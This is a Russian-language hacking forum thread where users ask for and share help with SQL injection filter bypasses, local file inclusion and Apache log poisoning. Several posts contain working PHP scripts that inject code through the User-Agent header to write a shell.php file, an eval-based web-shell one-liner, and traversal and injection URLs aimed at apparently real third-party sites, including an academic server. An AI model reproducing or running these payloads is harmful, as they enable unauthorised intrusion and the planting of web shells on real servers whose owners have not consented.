Ваши вопросы по уязвимостям.

ищи диру под запись,админку, ws_ftp.log и т.п.
веб-сервер какой?

 

Какие есть методы заливки шелла, через форму загрузки изображения ?

 

Смотря какая проверка расширения стоит

 

вместо пробела можно попробовать табуляцию
можно вообще без пробелов вот например рабочий запрос:
select(1)union(select(1));

 

а скакой версией ты работаеш?
если 5 то зачем тебе лимит?

 

budden ну так синтаксис и вправду неверный сравни еще раз запросы.
Еще в твоем случае надо быть уверенным что перед лимитом нет order by

 

budden, перечитайте пост гизера повнимательнее - юнион не нужно заключать в скобки

Code:

... limit 0,2 union(select(1));

 

Если в лимите и после order by то никак.

 

Можно, если FILE_PRIV = Y (В этой же теме вопрос уже всплывал).

 

Часто попадаеться шелл с фряхой 6.3. и на всех биндиться порт. Токо эксплоита не могу найти под неё. Можеть ктонить знает?

 

Не могу никак прорулить скуль.

В которой фильтрующийся слова select ,union, or, and, order, group

Warning: pg_query() [function.pg-query]: Query failed: ERROR: ошибка синтаксиса в или рядом "UNION" LINE 3: WHERE c.id = 57+UNION ^ in /opt/newrss/htdocs/sabre/libs/Db_pgsql.php on line 37

Warning: pg_query() [function.pg-query]: Query failed: ERROR: колонка "UNIONN" не существует LINE 3: WHERE c.id = 57+UNIONN ^ in /opt/newrss/htdocs/sabre/libs/Db_pgsql.php on line 37

узнал что стоит PostgreSQL 8.2.9 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070925 (Red Hat 4.1.2-27)

Прочитал http://forum.antichat.ru/thread35599.html результату не дало!(
Есть выход?)

 

"+" замени на пробел и все заработает)

 

http://dev.rssportal.ru/catalog/57'+order+by+1/*

 

PHP:

<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
    echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>

почему не работает? на сайте создаётся пустой файл (без кода)

 

потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>

PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))

 

слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения

 

спс. щас буду фиксить. я просто думал что интерпритатор, сам вместо той переменной подставит код, который в ней. а он это ХЗ почему не сделал.


UDP: Аааааааааааа всё допёр.

 

Такой вопрос. На сайте есть инклуд логов апача. Логи очень большие по ходу. можно ли написать скрипт на пыхе со спецальными заголовками. чтобы он проинлудил лог, а ответ не дожидал. потому что когда я в браузере инклужу большой лог, то у меня всё висит. подскажите плиз

 

PHP:

<?php 
@set_time_limit(0);  
@ini_set("display_errors","1"); 
  function get($url)  
    {  
        $ch = curl_init();    
        curl_setopt($ch, CURLOPT_URL,$url);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
        curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');  
        curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp"); 
        $ss=curl_exec($ch);  
        curl_close($ch);  
        return $ss;  
    }  
      $a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');  
      #echo $a; 
      echo 'ok'; 
?> 


 

Pashkela, большое спасибо за код.

вот я проавильно подставил?

PHP:

<?php 
@set_time_limit(0);  
@ini_set("display_errors","1"); 
  function get($url)  
    {  
        $ch = curl_init();    
        curl_setopt($ch, CURLOPT_URL,$url);  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);  
        curl_setopt($ch, CURLOPT_USERAGENT, "<?php fwrite(fopen('shell.php','w+'),'<?php phpinfo();?>') ?>");  
        curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp"); 
        $ss=curl_exec($ch);  
        curl_close($ch);  
        return $ss;  
    }  
      $a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log');  
      #echo $a; 
      echo 'ok'; 
?> 

UDP:

я так понял этот код работает как браузер. токо отличие в том, что он не выводить лог. т.е. там #echo $a;

закоментировано, и поэтому не томозит?. я правильно понял?

UPD: Pashekela, помоги пожалуйста найти рабочие логи, несколько перебрал, не логируют...

вот конфиг http://www.impan.pl/~ecmtb11/index.php?file=../../../../usr/local/apache2/conf/httpd.conf